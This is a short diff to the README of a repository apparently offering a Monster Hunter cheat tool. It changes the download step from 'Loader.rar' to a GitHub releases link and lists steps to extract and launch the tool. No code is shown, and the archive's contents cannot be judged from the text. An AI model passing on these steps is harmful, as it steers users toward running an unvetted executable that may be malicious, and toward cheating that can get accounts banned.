MGamer15YT/Monster-Hunter-Cheat/README.md

 ## 🚀 Installation

-1. Download **Loader.rar** from the official website or trusted source.
+1. Download **https://github.com/MGamer15YT/Monster-Hunter-Cheat/releases** from the official website or trusted source.
 2. Extract the files into a folder of your choice.
 3. Launch the cheat tool and follow the on-screen instructions for setup.
 4. Start **Monster Hunter** and activate the cheats you wish to use.